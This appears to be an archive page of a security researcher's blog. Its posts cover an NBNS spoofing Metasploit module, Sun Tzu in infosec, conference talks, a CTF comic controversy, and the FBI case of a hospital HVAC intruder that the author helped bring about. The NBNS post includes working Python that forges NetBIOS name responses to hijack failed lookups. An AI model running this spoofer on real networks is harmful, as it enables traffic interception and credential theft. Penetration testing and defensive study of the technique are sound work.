Tim Medin, over at the excellent Packetstan blog, just wrote up an excellent post detailing the implementation of a NBNS spoofing module which has been added to the latest Metasploit trunk:

This module is based off an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows proceeds to NetBIOS Name Service lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fail through to NBNS for various reasons.
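To make the fall-through concrete, here is an added example (my own illustration for this page, not nbnspoof.py and not the Metasploit module) that parses the NetBIOS Name Service query a Windows host broadcasts on UDP/137 once local and DNS lookups fail, and builds the positive name query response a spoofer would send back. It works on raw packet bytes with a constructed sample query, so it runs offline; the wire layout follows RFC 1002 (12-byte header, first-level encoded 32-character name label, NB type 0x0020, 6-byte RDATA of NB_FLAGS plus IPv4). The hypothetical `targets` filter and the sample name/IP are assumptions for illustration. A real spoofer would additionally sniff on the LAN and send the reply to the querier's source address and port.

```python
"""Minimal NBNS (RFC 1002) name-query parser and spoofed-response builder.

Added example for this page: not the original nbnspoof.py and not the
Metasploit module. It operates on raw UDP/137 payloads so it can run
offline against a constructed packet.
"""
import struct

NB_QUERY_TYPE = 0x0020            # QTYPE / RR_TYPE "NB"
IN_CLASS = 0x0001
FLAGS_QUERY_BCAST = 0x0110        # RD=1, B=1: what a Windows host broadcasts
FLAGS_POSITIVE_RESPONSE = 0x8500  # R=1, AA=1, RD=1, RCODE=0


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: 15-char space-padded name + 1-byte suffix,
    each nibble mapped to 'A'..'P', wrapped as one 32-byte label."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc.append(ord("A") + (b >> 4))
        enc.append(ord("A") + (b & 0x0F))
    return bytes([32]) + bytes(enc) + b"\x00"


def decode_netbios_name(label: bytes) -> tuple:
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(label) < 34 or label[0] != 32 or label[33] != 0:
        raise ValueError("not a single-label NetBIOS name")
    enc = label[1:33]
    raw = bytes(((enc[i] - ord("A")) << 4) | (enc[i + 1] - ord("A"))
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def parse_nbns_query(payload: bytes):
    """Return {'txid', 'name', 'suffix'} for an NB name query, else None.
    Responses and non-query opcodes are ignored so a spoofer never
    answers its own (or another spoofer's) replies."""
    if len(payload) < 12 + 34 + 4:
        return None
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!6H", payload[:12])
    is_response = flags & 0x8000
    opcode = (flags >> 11) & 0xF
    if is_response or opcode != 0 or qd != 1:
        return None
    name, suffix = decode_netbios_name(payload[12:46])
    qtype, qclass = struct.unpack("!HH", payload[46:50])
    if qtype != NB_QUERY_TYPE or qclass != IN_CLASS:
        return None
    return {"txid": txid, "name": name, "suffix": suffix}


def build_spoofed_response(query: dict, spoof_ip: str, ttl: int = 300) -> bytes:
    """Positive name query response that maps the queried name to spoof_ip.
    The transaction ID is copied from the query so the victim accepts it."""
    header = struct.pack("!6H", query["txid"], FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr_name = encode_netbios_name(query["name"], query["suffix"])
    nb_flags = 0x0000  # G=0 (unique name), ONT=00 (B-node)
    rdata = struct.pack("!H4B", nb_flags, *(int(o) for o in spoof_ip.split(".")))
    rr = rr_name + struct.pack("!HHIH", NB_QUERY_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return header + rr


def build_query(txid: int, name: str, suffix: int = 0x20) -> bytes:
    """Constructed sample query (not a capture): what a Windows host
    broadcasts for a file-server name after the DNS lookup fails."""
    header = struct.pack("!6H", txid, FLAGS_QUERY_BCAST, 1, 0, 0, 0)
    return header + encode_netbios_name(name, suffix) + struct.pack("!HH", NB_QUERY_TYPE, IN_CLASS)


def maybe_spoof(payload: bytes, spoof_ip: str, targets=None):
    """Per-packet decision: answer only NB queries, optionally only for
    names in the hypothetical `targets` set (e.g. {'WPAD', 'FILESRV01'})."""
    q = parse_nbns_query(payload)
    if q is None:
        return None
    if targets is not None and q["name"] not in targets:
        return None
    return build_spoofed_response(q, spoof_ip)


if __name__ == "__main__":
    sample = build_query(0x1234, "FILESRV01", 0x20)   # constructed input
    reply = maybe_spoof(sample, "192.0.2.10")          # example spoof address
    print(reply.hex())
```

Note that NBNS carries no authentication at all: whoever answers first with a matching transaction ID wins, which is why a single host on the broadcast domain can redirect every failed lookup to itself.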

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!


I really enjoy reading non-infosec books, audiobooks, articles and the like, consuming them with a mental exercise: finding out what lessons could be learned and applied to security.  My specific interests are in forensics, penetration testing, vulnerability analysis, exploit development, and profiling attackers.  Currently, as an occasional escape from technical material, I’m looking at some of Paul Ekman’s books on deception, with an eye for how it applies to topics like social engineering engagements, and even interactions with others in the infosec community.  Even with the controversy surrounding the research, there are some lessons to be learned, tricks to pick up, and things to think about.

As much as infosec professionals quote Sun Tzu’s The Art of War, I thought that I ought to check it out.  I downloaded a translation of it onto my iPod Touch and read through it in my spare time.  I felt as though I must have missed something, as I really didn’t see how most of it applied to security in anything more than a superficial way.

Now, at least I know that if I missed something, attrition.org missed it too.  They’ve posted a very well-reasoned analysis of the use of Sun Tzu’s work in infosec, pointing out all the places that it really doesn’t make sense.  Many of these are sticking points I also had when I tried to make the connection myself.  I especially agree with a fundamental point that the Attrition.org folk make: Defenders in infosec are strictly defenders, with their hands tied behind their backs when it comes to attacking the other side.  This is kind of a buzzkill for much of Sun Tzu’s advice.

As with most Attrition.org articles, they pull no punches and call out people specifically.  This makes some readers uncomfortable, though I do think that it’s a fair and honest assessment.  Give it a shot if you’re looking for a good (and very different) read.

(Disclaimer: I have cooperated with the attrition.org guys on a couple of their writeups (though nothing compared to their original research), and I am pretty partial towards them and many of their views.  I just hope that if I ever stray into the danger zone of their “charlatan” list that I’ll have earned some kind of warning first ;) )


I’ve been busy this week teaching part of the intro series of courses we have at the National Forensics Training Center, but I still wanted to post a quick update.  I figured I’d share a few interesting things I read this week, and talk a bit about some extracurricular activities going on in our lab tomorrow.

For a couple of weeks now, I’ve been using Instapaper to mark articles and sites to “Read Later”.  The benefit of Instapaper is, with the integration and sync’ing between all the different computers I use and (crucially) my iPod Touch, I actually wind up reading things that I intend to read later, instead of them just getting bookmarked and forgotten.  While I’m on WiFi I can sync them all up to the iPod and read them anywhere, offline, where I don’t have the distractions of grabbing new emails and messages.

Some things I star’d and enjoyed recently:

  • Should I Learn Assembly Language – HD Moore tackles the question of whether or not penetration testers have a need to learn assembly language.  Spoiler: The answer is, essentially: you can get away with not knowing it if you just use the shellcode in Metasploit, but it’s a must if you use public-sourced exploits or just want to understand how the shellcode works (which you should).
  • Network Time Protocol (NTP) Fun – Cool little writeup over at the carnal0wnage blog about a new module in Metasploit that performs some information gathering over NTP.
  • Clueless FUD Article… – In which Steve Manzuik points out that there is a lot more information sharing going on behind the scenes in infosec than you might be aware of (or at least more than the author of a specific DarkReading article is aware of)

Tomorrow afternoon, a group of guys (who have historically done well in past CTF events here at the university) and I will be acting as the red team for a cyber-defense exercise being hosted by the University of Alaska Fairbanks.  They have a nice VMWare setup in Fairbanks that all of the teams will be remoting into, and we’re really looking forward to giving the participating universities a hard time.  If you happen to be one of the readers who are local enough to Mississippi State University to drop by for a visit, feel free to come by the forensics lab in Butler Hall tomorrow between 1:30 and 7:30 PM to see how things are going.


If you took a look at the slides for Monday’s lecture (or were there in-person), you might recall that the last slide of content contained quotes from the ETA’s current site on the Internet, eoeta.com. The new leader, “Xon”, has disavowed the actions that led to the previous leader’s arrest, and is very firm in stating that the new ETA is “ethical” and no longer engages in illegal activities.

Registration on their forums has also opened up, and I was surprised that Xon made the goodwill gesture of activating the account I created the night before my lecture. Here’s a direct link to their forum section:

There are still posts on the forums that go back to just after Jesse “GhostExodus” McGraw’s arrest, before the ETA’s attempt to transform into a white-hat organization, so there is some pretty interesting reading there.  Registering an account and having it approved by an admin is required to gain access to the forums; however, the process seems to go pretty fast.

Is the Electronik Tribulation Army really a white-hat group now?  While Xon may feel strongly about the transformation, he may find it difficult to bring the members in line for it.  With members like “E.T.A FIXER” (aka DarthAnonymous, TrashBagTeddy, etc.) who continued to troll the comments sections of this site, and scroll insults (and creative ASCII art) in this site’s IRC channel long after the arrest, other ETA members may find it difficult to convince others that they have truly abandoned their blackhat ways.

This is also the first time someone’s made a “motivational” poster about me.  Touching! :

(Credit goes to Fixer.  I did crop the image a bit.  You can find the original in a couple of threads on the ETA forums)


Much like last year, a few of the more high-profile talks from Black Hat this year have been released on the web site pretty soon after the conference:

The following talks have video available, as of this posting:

  • The Language of Trust: Exploiting Trust Relationships in Active Content – Mark Dowd, Ryan Smith, David Dewey
  • Something About Network Security – Dan Kaminsky
  • More Tricks for Defeating SSL – Moxie Marlinspike

Slides and papers are available for most of the other talks.

If anyone has a public (or private) lead on getting audio/video recordings for the rest of the conference, contact me.  I’m going to keep an eye out, and when I see anything new that’s publicly available, I’ll link it in a new post here.


Earlier today, this was making the rounds on twitter:

It’s a cute-looking manga-style comic about team Sapheads’ experiences with the “Binary 300″ challenge in the Defcon 17 CTF pre-quals.  It’s kind of entertaining, and looks informative, if a bit engrish-y.  I scrolled through it quickly, bookmarked it, and planned to give it a good read later.

At first glance, I especially liked that there was a female character on the team, which I thought could be a very positive thing.  That is, until I saw this making the rounds on twitter later today:

…the above is a discussion of the “Tiffany” character in the comic strip, who turns out to be a ridiculously stereotypical depiction of how some view women and computer security research.  Not only is “Tiffany” an offensive stereotype, she’s a terribly one-dimensional and annoying character, only serving as a foil.  She asks questions about what’s going on to give the other characters a chance to go into detail, acts all confused, and that’s about it.  I suppose the other characters are just too l33t to be able to ask those questions of each other.

As far as I can tell from the original Binary 300 write-up and anything else I can find out about the Sapheads, the comic’s characters aren’t based on their actual team line-up.

The author of the Female Stereotypes post also relates her own experiences of how she’s treated as a female in security research, and it’s very eye opening.  I highly recommend reading it, as well as the original PDF writeup of the Sapheads attempt at this challenge.

Edit: The author/artist of the comic updated the page to apologize and explain.  In future comics on other challenges, the “Tiffany” character will serve a more useful role than “cheer-leader”.  It turns out that there is no female member of the Sapheads team, and that the character is based on a famous Korean singer.


If you haven’t read Part 1 of this story, then you really ought to take a look at it first.  It serves as a good overview, and the criminal complaint filed by the FBI is a good read.

Yesterday afternoon was GhostExodus’ detention hearing.  I’m not very familiar with the process one goes through after being arrested for something like this, so I had to look up what this meant.  I found the following site which, I believe, explains detention hearings well:

(Looks like a cool site beyond this, even.  Kind of a legal equivalent to the blog I run here.)

I was informed yesterday afternoon that the Judge in this case found that there was probable cause to detain Jesse McGraw while the case is pending.

Here are some links to the coverage this is getting.  I’m linking articles that I think my readers would enjoy, especially those where the reporters were thorough enough to contact me personally to get the stories:

The members of the press I’ve talked to on the phone and over IM have been very nice.  There are many more stories than this; you can poke around on Google News if you like, but your best source of technical information for fellow security and control-systems folks is going to be right here, of course :)

Now, time to break out the popcorn.  Here are two of the most interesting videos that were posted to GhostExodus’ youtube accounts.  It’s my understanding that these videos were played in court yesterday.  After each video, I’ve summarized some points of interest in each video:

  • “Post July 4th” is a strange choice of title here, as it’s before July 4th, and in preparation for the attacks scheduled for the 4th
  • He’s recording this by holding his laptop in front of him (reflections in elevator)
  • Claims to have infiltrated corporate offices, but it’s obviously a medical facility
  • Watch for medical charts and such on the walls when he sits down
  • Appears to be the collar of a security guard uniform peeking out of the top of the hoodie
  • The FBI identified this computer at the clinic by the toy flamingo on top of the monitor

  • This was recorded at a desk at the hospital where McGraw was a security guard.
  • I thought about buying one of those camera pens until I saw this.  Not inconspicuous.
  • Showing off your fake FBI credentials on youtube isn’t very smart.

I will continue this series with more posts, discussing the HVAC compromise, how I came to be aware of it, and the techniques I used to gather information on the suspect.  Still pooped from talking to so many people about this, but I’m enjoying spreading the gospel of control-systems security ;)


My phone has been blowing up most of the day about this. To sum it up: On the evening of the 18th, a script kiddie that was involved in a previous post on this site (“Perl Hacking is Dead”), XXxxImmortalxxXX, contacted me and began to brag about hacking a hospital’s HVAC system. Upon further googling, it became apparent that XXxxImmortalxxXX was lying to me, and that it was the leader of the group Immortal had joined that allegedly carried out the attack. This attacker went by the name of “GhostExodus”.

As most of my readers here know, my research area is control systems/SCADA, specifically human-machine interface (HMI) software. Being involved in a field that involves elements of our critical infrastructure, I know how serious an incident involving a hospital’s HVAC system can be. Screenshots taken by the attacker showed an HMI that gave the user control over many elements of the hospital, including pumps and chillers in the operating room. Messing around with a system like this can seriously impact the health and safety of the patients.

I spent a large amount of time that weekend gathering up information on GhostExodus, and his hacker group, the “Electronik Tribulation Army”. Monday, I met with my major professor at Mississippi State University’s Critical Infrastructure Protection Center, where I work as a Ph.D. research assistant. I presented the information I had found, and we contacted the Texas attorney general’s office and the Jackson, MS FBI office, where we already had contacts. For the rest of the week, I cooperated with the FBI by sharing the information that I had found. GhostExodus was picked up by the FBI on Friday night.

I plan on sharing more, because there’s a huge amount of interesting data, images, and video involved with this case. The alleged attacker uploaded many videos of his actions to Youtube and other sites, and when I put it all together into a coherent lecture, it should be pretty informative and entertaining. Until then, there’s plenty of media coverage of the arrest:

Google News shows over 170 related stories.

The best and most accurate thing to read, however, is the criminal complaint against “Jesse William McGraw”. I have been informed that this is part of public record, however I have taken the liberty of editing out SSNs, DLs, VINs and such on this copy:

(Edit: moved it offsite, because it was chewing a lot more bandwidth than you’d expect.  You can read it online or download it from the above link)

If you’re reading the above, I’m “CW-1″.

I plan on keeping you updated on further developments and more information as this progresses. There will also likely be some very interesting multi-media talks and lectures I can give on this, so if you want me to take the show on the road, get in touch.

For now, though, I’ve had a long day, and I shall rest :)


…and not the economies of running a popular security conference ;-) .

I’m not usually one to just drop a link as a post, but this one totally deserves it:

Richard Bejtlich is right on target with this one.  He describes how a criminal element could spend a one million dollar budget on what would be a very successful, profitable, and sustainable hacking enterprise.

It’s an extremely entertaining and informative read.


I’ve spent some time looking at these posts over on Gustavo Duarte’s blog today, and I am very impressed.  Gustavo has taken the time to write an entire series of posts on x86 internals, focusing on how memory works and the boot-up process.  He uses Linux and, to a lesser extent, Windows in his examples, and has really great illustrations and diagrams of all the concepts.  Combine that with an excellent writing style and links to good reference material, and you have one of the most accessible and readable introductions to these topics that I’ve ever seen.  

Here are links to the topics from his “Internals” series, although his other writings are worth checking out too:

These are core concepts for those in the areas of vulnerability analysis, exploit development, and (good) penetration testing to know, so read up :) .

I ran across this blog from a link to the most recent post earlier this morning, and unfortunately I spent enough time at the site that I can’t even remember now where I found it.  Otherwise I would give some credit to the person I’m following on twitter or RSS that linked it.  If that person happens to be you, leave a comment to claim your fame :) .

© 2012 McGrew Security